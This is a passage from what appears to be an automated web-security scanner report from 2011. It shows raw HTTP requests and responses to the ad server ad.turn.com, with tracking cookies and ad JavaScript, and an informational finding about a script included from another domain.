ayfYow3TS_pRffsD1QMAPrsB9Edfeqxoyc-pC_2W_bc6ewxhFwGvHUoPaaHnaoorULvxTzi44m1_Si-euS0zvZ4Sy6x3y4oBWPJSpYQc9hMA6Upo39y-px8dz54g50gXlKFn0w_61FWrucAA4n2-3CMAbQ96XgsdMp68CY-i0F0mEcU4d3dpJcURMhRM2LhpW-3_PATP0lCcTuEpgm1oB6Mt98YrnVmAXvL6koORN8ahDMn98RAsmwrRTD9o2SJxjqGPytYYwfCTWuOI6iK62k4xtoN-1-5A&acp=TbRAZAAC2tsK5XbqIPpc8lxQHpbwNolfLMpt4g&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBipcRZEC0Tdu1C-rtlQfyuemHAsCshNAB-KLb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYi5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmAJkwAIEyALsk-kJqAMB6AO8AegDlAL1AwAAAMSABuHh9obM1uH8Ww%26num%3D1%26sig%3DAGiWqtyMckh3wZa7xNgeCD_9yTTL6zDYkw%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658599151&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658599159&frm=1&adk=513358139&ga_vid=955713783.1303658599&ga_sid=1303658599&ga_hid=1255304632&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=ccLvK9U7QtRdQShOfq29UyRA0hWOzjunjXltn4Ro0wLfaqaDzVRu9ZiuBStYaftY77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdd0SKdPzhEKaKWeI5Yx2N7aA81RFV7Ju3REEBkpNZET3_AH03m22f6LSucPu24XFtbJoH4cOuvYUlTkCNcoKzYAk3NUPm8pwlGf5Ch1PutwrWnSvjM6YIyaPo076xrJcUNwbiSZqdEKL6qcppfxujGOl00l94DPr57wWUBTyRbAx6SFM-Ia8iW6v4r--R4cQ0vlVHWJOdM_ZTcKgFSOlW-v76c4pTy1x4tO_Sj_92V_c9l9yJcRs-_HV2FNNdqgmWKwzOueNcvo-1XmGz_MBiuXyjJSUibZ2BHh2T3FSfjGAITyiawrkOih_FdqW5ZHwRtMNQF2iyMUjVL7ttzR-BfUzv-eZrtlUUUI4c_78m_3_c5cySrnTOh9dMxUw7WE-ja_3nZQmNNcCcp3_wtIWynWBXJ7BVYb5SQq17PzxVE1C6477_djhhS3SPkBUOiwXvN2UB-mbqJWj3F9DmOa47ugri-pvt5MhqWaQjjpMBxrbP88WWl0G0-IGYzqbaILcNa3VMZDZgEWVs3Qz2BttiQfQ912etMxHez7HFbRYJQYust_BLX_n2e0dL-0aj8mixtcWuh9OwP5WPMPXscRpCIMFJd1V6hK_6XZdSXRi1-9fBCyOg31PpLP2jtWuqGVpHCpDjfslrVyDxMBDlIppEJHn4tBFuPx-iDBchd3Xj-d6mnSvjM6YIyaPo076xrJcUPFlP5zO97faJzZ1aEtSW6dEc4daKu1RR2_0SqsSvHV96fpCL8Eb_AKATM_EJjD9j33kP4Nrko0okcXRXUghtRr76c4pTy1x4tO_Sj_92V_cwkPlA1bugHQgsNwNUN2EW3vp6h1m4YoN9gfv5UHXFQ2IC2DhdDGl4eOo_AeA0QhrRR8ZQb2LnR0fR8FdQf63bxMNQF2iyMUjVL7ttzR-BfUCSUxGKV05l1cGmXYc-J8685cySrnTOh9dMxUw7WE-jawGQoklAJzdveKdvZB8xorXil4TWqZs2Fc7APxLqKkAa477_djhhS3SPkBUOiwXvP23sgE4QizgtxzDeUH6ed8ri-pvt5MhqWaQjjpMBxrbGAV0u7jnu-eT7fscIjrTHjekC0SQGeXG_xb5T35Ss4efvOlTreFo8nIhLOXDY0psSnAQFqLbCQVMKL0SHYQuupcWuh9OwP5WPMPXscRpCIME_H2_mgzLFa4hlL8c6saRH0j2kee9z_x-ARl44ojjAapDjfslrVyDxMBDlIppEJHAtEJaHH6FiwpVk1TbTCs4Pz02zxgwih1t32hJDzR2iRXwQ3_DbEzpjmCmVHD87QzadK-MzpgjJo-jTvrGslxQwHGaeF-WAjW7mJndH2YOVwnmSpuC_J3YHxfjAKmX_B04URqqaHNzgB7E6-VsRza8HA3VcuutiZOC52FKO3yoHzvpzilPLXHi079KP_3ZX9zjadLD_W4Qk25QaIl2BiwNWYjiJWk9aQzyVLZH2OXmNbKV1B7NBMN8fr3nrJxtWo7FLj2bFHEeYmREZSg8ADBFkw1AXaLIxSNUvu23NH4F9SkzNOjGWKQGeKTtJ4HtrvVzlzJKudM6H10zFTDtYT6NqjNrOxeF8jsNeArRzd1s-x6ni1qbTBwW4MUEN1JdpM3rjvv92OGFLdI-QFQ6LBe87RxY6maGdv72eHuIFUDWKyuL6m-3kyGpZpCOOkwHGtsTJv5rtLhQ6dRr4jL8-o8Q68bcUqbFMpI-C-npTlLMx1SiOGlfTWtXL36ePiOy9aUQjiE1VNrAoqhhI_BVRY4D1xa6H07A_lY8w9exxGkIgzb_uapo_3GEjtQiNCUDA8sLPlqlRXWjl7eyI_CFu0hP2ckgCGSuiZNCnk1aHQCYkCgXmHzsmMRGgA0PrWVAGQ9adK-MzpgjJo-jTvrGslxQ7m6MVSNRUpqQ2D-10cypClv9BiYngppqZAgOJPk3JR32_hjlieDEGkxFdag2l_Aoc92R9o7AwpEl_z76FPzBpnvpzilPLXHi079KP_3ZX9zDTgBGp5IRkjrCAJTV8ZVAh1hJ3Lx2jTH6Z2vbSJvJVj_wcYOmG1ekAJmxsrcnmB-BBip3t4loip6gpJE7PRXhUw1AXaLIxSNUvu23NH4F9RPZZPOeGksgK52Qk4Yl60ozlzJKudM6H10zFTDtYT6NjElSgtlUCOcJy3pQW5jN33Kfmv5vVtdGhz4fVjqsFSY2Q24GDIb9Ig_sE3JF_KtqXxT5SmcZWzceN7XXcpz3Laj1iqJAw0pRiPxGBAqA2RguFxSuIusHqs-ANeRqI2eX0-W1jQPyJ9G5swrvmSFjnv5CByYP35e21Aw1IYnm6BihTKE7NZh8XhewTjqO8PhyAWwnurw8UZTM80oyuw1nZlP-zJhZZ-Q1bjRitacbaxOVTP9qcmAVf1O57ebp5SQNZSGXGpVGHhUYdpuUFiTjAlIA6qqP3BKO_N7QLYJ3-V2JF1diQSQ1nvXkYY9WDOjGVCWFcKk0OcK1paod2fc3z9PTR76F7aRbqUZNhA6AnczEot1eKTaALu3bxsky_SF7xrqIY4uIILMFgOWc-MUVQGUh5NYki1nFLjbBW-SMmWII58FWMHxHN9h4DqRCViFvMbXDpwiPTREhuOK4UpMWBgaaKd8aPfSclggHpvcnj1rTQa547WaZ7vej-BKaHXRnSiWKGazF07-sb9WbMJcB69Uzu4XKtxm-arTbtpAldmp8flrd8Pliv5vI_mjE9mWMY8KwsEwgd20k5ELAKwe3k279Aus6b5L4_NZc9G2gsPjvykZyrZ0lJbepgbY9J6LUbR3eEBbRxGTiyMX7kM5_NYwE2eVqCLcXBoZRYALyknr3LMopBM3AO5sKxGXe66Xcf1bUBS5gLuXGklliOTAkJuZ294oTg07S25wzyY5hqce37GgssTXYn2Xq8BZZgg2HObpk1xG3bToP3rXxzkj99ob5G0iiG2c_fr_eXLG84IsFvl6CwW7WMzXN4Hy5VoXWdaDuBsa5-28Mf8id0a4QFFD8ZqHLAvGnCoQ5AOuBKm4L9PTq1WYbcqAhEgQ83H5jMT6_nHF-Y8EU68DntCrjSQhIAIJkqhLZq2eZKjN4-l1K9pctvwsmq0JVN5pjnr7Cfg7jEMAhNszr5vuhm7M1ncvWgg4Yu1PCxkrNZyc-7VV-X_mx9F_7A7hdJLrSJaQwEjFn7eCNBMEz5wEn4z2HwUeSE9GcePbxvwdOT2mw813dZLTgxswKbPWb5-ti9vvM3TUADBPX2cC3KvSE-hYOcql6PYaa2Yof4H8ZbNEXKfxVWD_EqNwcSG3SB7DIjAFUePeH61RVAavNz6UfSwJ9-LZSLv5mnE5HrFnrMAJuA2Ehz39nqEfupWDpbXsEB9HKrCY6EDv-NGLxdTyLmLO0Agh-ExB6IF4sY8Tq5KqaEWYITXkUKx3KsUe2Po5SVOIqioXp52XStQPhMwXyt2Ad5s; fc=kZobV0mv2OChfkn6NxQs5IZGf83ZoUpCw_-LIwCF6JKXj2VWkQs_pZe2x4BlBj3dlN1QdeW4zlTZ3FmFjhpKQWfGrPx0K-SOL3w7moPxVd8PpZsczLZg-X3ewhfnbE_kaq3VcZ9RZeFJ5DmVciVRNT-17uf2fQ8lD0LtIx6_Iq4; pf=NorDLowqwpEErYS1IRlXOCfhHOczs2r3pVTqk5-dp_aS04H7stKnZdMqlx3yK2bUcy-iZ5wUC35PPQSMEVdkipxKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 15:23:17 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:17 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=IOm-9eUfzJE5t64hRDIt0zc_YOOYoH5iAoJDp0qhYG-Y481wEkFtGX7HudJA1SwJ77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdd_NeHpirdcMFfI8fO5dnT_PLrZwiRGgyh_MJR-M-ApSJyckovI9VBGSzpZfR8FHPdSSO3kAipW9Q9kWLZ-MJl_BrftuWyTDvwUtbSpm9eZvGnSvjM6YIyaPo076xrJcUO8BVXP0P0kDQBcxYVqJq4WnUL9zFp76gzRF15RP8Q9KIyZ74aPux2C99RMycWzdi7GLYP54sbK8T8cZhoeBWYu76c4pTy1x4tO_Sj_92V_c9yNIOBYB9A2wOEs8WKRPUcOtA-yYJHFrReS8rj8aZLb39uQ1iPta8Wrn8c58UAYuso-Mc3i4V4Q0Y9NWCrnbQJMNQF2iyMUjVL7ttzR-BfUbHKSnkYu9iMX4qj0tqHHks5cySrnTOh9dMxUw7WE-jbOz16PuTPjhPfxJX8Ty59Sj7f8ibFTFhojQbBB5-JlSq477_djhhS3SPkBUOiwXvOi5Fgu10En2_NiR79s1111ri-pvt5MhqWaQjjpMBxrbLFKZnmTCPh4wDgOEmr_jJxHE0nhTFNONjqHgUYm4FpRfvOlTreFo8nIhLOXDY0psZuqfgOi4oylyQlDcE1kSHJcWuh9OwP5WPMPXscRpCIMCnCxyGugHBE9FTQ_IvAvZIN9Q_fjvM40K0xc0YEcl4L89Ns8YMIodbd9oSQ80dok4XSyCFv6qiNgfItGth8yYGnSvjM6YIyaPo076xrJcUNhggDeUdfGoPZJlKeW4R1HEc4daKu1RR2_0SqsSvHV93nRLZ7BQJ3BesUmQ_jjYmjVSEyKGxHSEDBnY-SbN8VG76c4pTy1x4tO_Sj_92V_c3sy_af5K1wDa53eNzFiV73vp6h1m4YoN9gfv5UHXFQ2EokABglYvcvHxrKLhk0Oa_Km3kT-DB1pnpY41igpyJxMNQF2iyMUjVL7ttzR-BfUlxiurrQNK1NDp-4mMBHEuc5cySrnTOh9dMxUw7WE-jbWH4kVY90906vEqljUXjN51Jt0mGvCxzEQwCiVbU9JMq477_djhhS3SPkBUOiwXvNZ5qXshwvYwx79p4ngj3vtri-pvt5MhqWaQjjpMBxrbO3BokNWkTLwjj2gCtgf5Qhl2YOxdQQWgOxtDIlnQE-ofvOlTreFo8nIhLOXDY0psUlTnGLNnnydFejHnHxno5JcWuh9OwP5WPMPXscRpCIMXQlyEV2-I3IIzy91bwO_d9EJo3mm3QAFgWCzMlsJM2789Ns8YMIodbd9oSQ80dokkKUxJ75kJBDo9prd088xC1yzr7JSNK1C6Wfrc4PoBe7PQexZTwznXHLToARBEFWiadK-MzpgjJo-jTvrGslxQxMOSg_OH8TApjcKQRDrCNo_fKO0O6rQrNBeK1ac1kY-R5cTHDVI8fjybjRvjybj510L1lHuYF9vOfs3PRLc9kbvpzilPLXHi079KP_3ZX9zZRVXQGO8fW7t8V-mYdCaHNEq30AVPVAGoRKur0pKj4xDrZjSDW0d6Ge5h2FkoPIancXXoaEoJE3Hc2DB_YXf8kw1AXaLIxSNUvu23NH4F9S_CGxtVF2UhIqHPNqrCcBYzlzJKudM6H10zFTDtYT6Nv-v4sX3PfZzMJc61lkh2-hBzDtWEUaNjGqsIqgzYdZZrjvv92OGFLdI-QFQ6LBe85R3vMoYhkXhWy5J91UXk-OuL6m-3kyGpZpCOOkwHGtsCD6mq_S30vkfPB6K8A_ZRfdaBCNZWyJXoWnm04UEXix-86VOt4WjyciEs5cNjSmxxPvN6RLPLO1p4lQ5lrgMzFxa6H07A_lY8w9exxGkIgxt0vsiobF6ODkmglJ7mWGMPTKgqOHGcDR_Emj6qnilT1JI7eQCKlb1D2RYtn4wmX8JnT_77eO3YOrJ4Sg6Z4khadK-MzpgjJo-jTvrGslxQ6fi7HczpIMBvCBfMsrwX6pv9BiYngppqZAgOJPk3JR39idVXIu3f3Btwc7IzjVzjy2rMvBfZvNr-p9IKhzMtG_vpzilPLXHi079KP_3ZX9zXb6Tz5WewXZbgAbPJA1Kjx1hJ3Lx2jTH6Z2vbSJvJVgmvJ__nR9G2kz2nFBjBqYhxmY5WhWxlfSu5D7TjXyp5Ew1AXaLIxSNUvu23NH4F9SRsHGj-wraaDOVo-NnY8Z4bGjtD6F1vlAvbNz2LW0-XKY7_lT1bl78jcEnJ5WkDxaCFrKFt2PqJqf5DVukUoXlIHbOBASPSx_aSP-y9lN0xDYq3g0SjnCHIdwFIgaPN2GjM2E94Xjq_zRsOz19_sukeQe8KkXlnoIS6MkKzv5MhJ-zCwLajI_fAi7yzInpUPfqRl9A2iCBQ4QmbLn8QybuN97-yRVKiOkq451CVtrK-L_B9P-PLsJaA2q91YwrJSsVjkSgci3DslhbhLAHtk-5yNmlzVaY-ux4ldMmn95-Mr2ngwrG9CjJIipUiIWpKw0p87U_E8RCtd37Q5K62pPbYE3fjGnapFf2sSY7pRQig4QkcT5omhxvFxaDBZv8HsDc7oWxx3lMWh66OLM4EbN-7gsqGSEylLNa_SWJb-nVLwCV0QM7hreP48O_HKFKVj-fDyYACmr51dWIG_2mo97mPu8Iaf_kTsqgk7ugXpuyF50sVuvaLjQZQB-z3BRWjAOi3ckepqtCIQvo_oG8eMg83LsUjEPrRcsES3aoJiQUJTHUYLYRhoyzRad2pnwkOXjJjGluiggZfpQC0_zBkEv-v_j1kf0lu_F76LshZ13njOq9AcoC0Ui5m2rwOSIdaFvHPrlj9faHB4xTE0H4ycU-Far0EQ9jI2dgmB77e0oaHmNisOYCeGi33B_vta6JSr3j6o1UpD0LBlPnfb4q3Dmtj6bGXbZIhpmPDYJ3mAwabzJVvtmA9XADUGeSzCUmHsqeVvKRG6bTklSz_s9jHGHsU5_u3GxZteiyVHpNKhDzL7vQ0mJRuzfPJxh9dK_7uFehBzO10MqyMuK8xC49hxun-96l9nCAyeIF8XErkhGdpskxfTLV8EIwWVQ2uHZJLUSdGm0TeMLOBK0QhS-o5a2xyahlNh3iZjtdsIooTjsgAVMIgXUnyIDF5CqCarUh49S01Mh8PTu4y-hqompR6VWaJIG7SFeGTv62fgtjg1I8JQTrvXTA5V0FO00TmOhQnOjFd2gRw98MdY27_C75SQT3F4_WO7NWBkt0qQueOBvF3XTM0Qj0i6d6Ne-SMo9ZRW34nL2E8dfUI4qK_3hTt65_O1ilUO_qIHp6Muzc_la1U_2OjiAOU7PEbuWm84pe5TEp0-dwH4uGF_DEF6HvhgoubqHZESmqy0_uUoo7aAuONZ3XbPI2lPBO0ew9_baQ3iGFyTbNllGW2-6SPL-Yz_5v0XPkSOvI7kYSdc19CnoSeevm6OsBW-cQfSWP67IsCnN3J3RK7HJ47DOwUgikkAA7HAeaX_6Zr-t3T_LQ2J_VLuAlmfHhZv8RdvHYfz6uVtWY4Zb1B-5Vx0eIvlVDYxBk; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:17 GMT; Path=/
Set-Cookie: fc=FYu9a2gKbdfaoEP6zzAEbTULe5uzocfVf8GeQRlhtGzifjwXXf-M0jf6P6DTaEkggmUcePzA9deCmnu56kGfo3G9nFGYIVw5iLaHzkGYEwm4HlP0fRkaM5HlzXZ0g2VP9BoIXaOAeDVXRsLRbsFkfKtr4MnGGfFMDcCsCfLKkyPojEuHv26X9eomoEX8ElP2; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:17 GMT; Path=/
Set-Cookie: pf=_1vlf3coaTRSlfnRn2BWvmKCqkXYWBqc-E6-ZlkCbgGS04H7stKnZdMqlx3yK2bUZZ6eDl_tJYtkuIVW7eskVZxKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:17 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 15:23:16 GMT
Content-Length: 10877


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
Mckh3wZa7xNgeCD_9yTTL6zDYkw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6648.150834.TURN/B5275279.6;abr=!ie;sz=728x90;ord=3204984562765078005?;click=http://r.turn.com/r/tpclick/id/9R05pnpkeiwPdg4A_gEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBipcRZEC0Tdu1C-rtlQfyuemHAsCshNAB-KLb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYi5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmAJkwAIEyALsk-kJqAMB6AO8AegDlAL1AwAAAMSABuHh9obM1uH8Ww%26num%3D1%26sig%3DAGiWqtyMckh3wZa7xNgeCD_9yTTL6zDYkw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...

24.33. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25805860&ahcid=973433&bimpd=Ip0ebvHq9-6cmCR2bXP5_fNx2AR3sIhp4p39Iz_V0Qg2ZWiQd3tT9BFQw06IP9QqBnjrxaFOX3A2Mp5hsqmn769niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BKRgeMWOxnhllrTwR4fSEloDYQQhNu9aqv6NqLy9PboSDUcW3gy4ahk2mxvXjqV_8HMdltWoLJ0ZRSlLXDIZEn8XYkMwDMhThyDTSkJz17--sccgy0lyoFcbjisrOYNESdVweqa0CK0OT2RuObPoCPAYfsAjue5PSL-h0Ho2t7SEPQ132Ppbuk7ijoUndfzz7lBPY5bJrxpuGqREB7_HXzaHnXpMPSYaXk1bDrduuz7117nSKtRoDtj2nylqWO-cGwaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IRxgM2aC6JuWrx_7_5RQ2-Q4-qt8dRxfRrYf9CqeMIgg4DbfNAl_25G-CXhfHV44tX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3gTaS1w5xhX3951duqXeD-FccmVnaGRMAMpWrCzFs9XNyZvJnZAWhwjW9SAf1pZAjbt_T370WDWWY1SqEwEJwbh74bkML2wXdcAojXeE04DSM7CYAs_o3XcXMAh-wjz3-xA9y0FUzpqtDC0K6uSmpOagRBN5xins51mVi5acEHrzqo408BxR9uazB8jKSDnLvk&acp=TbRAZwAJT0AK5X5HHeFjM7WcAPevK6xDUElKMQ&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBNp-zZ0C0TcCeJcf8lQezxoXvAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtxE7bubHFUSlRmGJouJjp8ZmJ6qhA%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676602&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658602580&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658602586&frm=1&adk=2614322350&ga_vid=1898243012.1303658603&ga_sid=1303658603&ga_hid=226900712&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=IOm-9eUfzJE5t64hRDIt0zc_YOOYoH5iAoJDp0qhYG-Y481wEkFtGX7HudJA1SwJ77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdd_NeHpirdcMFfI8fO5dnT_PLrZwiRGgyh_MJR-M-ApSJyckovI9VBGSzpZfR8FHPdSSO3kAipW9Q9kWLZ-MJl_BrftuWyTDvwUtbSpm9eZvGnSvjM6YIyaPo076xrJcUO8BVXP0P0kDQBcxYVqJq4WnUL9zFp76gzRF15RP8Q9KIyZ74aPux2C99RMycWzdi7GLYP54sbK8T8cZhoeBWYu76c4pTy1x4tO_Sj_92V_c9yNIOBYB9A2wOEs8WKRPUcOtA-yYJHFrReS8rj8aZLb39uQ1iPta8Wrn8c58UAYuso-Mc3i4V4Q0Y9NWCrnbQJMNQF2iyMUjVL7ttzR-BfUbHKSnkYu9iMX4qj0tqHHks5cySrnTOh9dMxUw7WE-jbOz16PuTPjhPfxJX8Ty59Sj7f8ibFTFhojQbBB5-JlSq477_djhhS3SPkBUOiwXvOi5Fgu10En2_NiR79s1111ri-pvt5MhqWaQjjpMBxrbLFKZnmTCPh4wDgOEmr_jJxHE0nhTFNONjqHgUYm4FpRfvOlTreFo8nIhLOXDY0psZuqfgOi4oylyQlDcE1kSHJcWuh9OwP5WPMPXscRpCIMCnCxyGugHBE9FTQ_IvAvZIN9Q_fjvM40K0xc0YEcl4L89Ns8YMIodbd9oSQ80dok4XSyCFv6qiNgfItGth8yYGnSvjM6YIyaPo076xrJcUNhggDeUdfGoPZJlKeW4R1HEc4daKu1RR2_0SqsSvHV93nRLZ7BQJ3BesUmQ_jjYmjVSEyKGxHSEDBnY-SbN8VG76c4pTy1x4tO_Sj_92V_c3sy_af5K1wDa53eNzFiV73vp6h1m4YoN9gfv5UHXFQ2EokABglYvcvHxrKLhk0Oa_Km3kT-DB1pnpY41igpyJxMNQF2iyMUjVL7ttzR-BfUlxiurrQNK1NDp-4mMBHEuc5cySrnTOh9dMxUw7WE-jbWH4kVY90906vEqljUXjN51Jt0mGvCxzEQwCiVbU9JMq477_djhhS3SPkBUOiwXvNZ5qXshwvYwx79p4ngj3vtri-pvt5MhqWaQjjpMBxrbO3BokNWkTLwjj2gCtgf5Qhl2YOxdQQWgOxtDIlnQE-ofvOlTreFo8nIhLOXDY0psUlTnGLNnnydFejHnHxno5JcWuh9OwP5WPMPXscRpCIMXQlyEV2-I3IIzy91bwO_d9EJo3mm3QAFgWCzMlsJM2789Ns8YMIodbd9oSQ80dokkKUxJ75kJBDo9prd088xC1yzr7JSNK1C6Wfrc4PoBe7PQexZTwznXHLToARBEFWiadK-MzpgjJo-jTvrGslxQxMOSg_OH8TApjcKQRDrCNo_fKO0O6rQrNBeK1ac1kY-R5cTHDVI8fjybjRvjybj510L1lHuYF9vOfs3PRLc9kbvpzilPLXHi079KP_3ZX9zZRVXQGO8fW7t8V-mYdCaHNEq30AVPVAGoRKur0pKj4xDrZjSDW0d6Ge5h2FkoPIancXXoaEoJE3Hc2DB_YXf8kw1AXaLIxSNUvu23NH4F9S_CGxtVF2UhIqHPNqrCcBYzlzJKudM6H10zFTDtYT6Nv-v4sX3PfZzMJc61lkh2-hBzDtWEUaNjGqsIqgzYdZZrjvv92OGFLdI-QFQ6LBe85R3vMoYhkXhWy5J91UXk-OuL6m-3kyGpZpCOOkwHGtsCD6mq_S30vkfPB6K8A_ZRfdaBCNZWyJXoWnm04UEXix-86VOt4WjyciEs5cNjSmxxPvN6RLPLO1p4lQ5lrgMzFxa6H07A_lY8w9exxGkIgxt0vsiobF6ODkmglJ7mWGMPTKgqOHGcDR_Emj6qnilT1JI7eQCKlb1D2RYtn4wmX8JnT_77eO3YOrJ4Sg6Z4khadK-MzpgjJo-jTvrGslxQ6fi7HczpIMBvCBfMsrwX6pv9BiYngppqZAgOJPk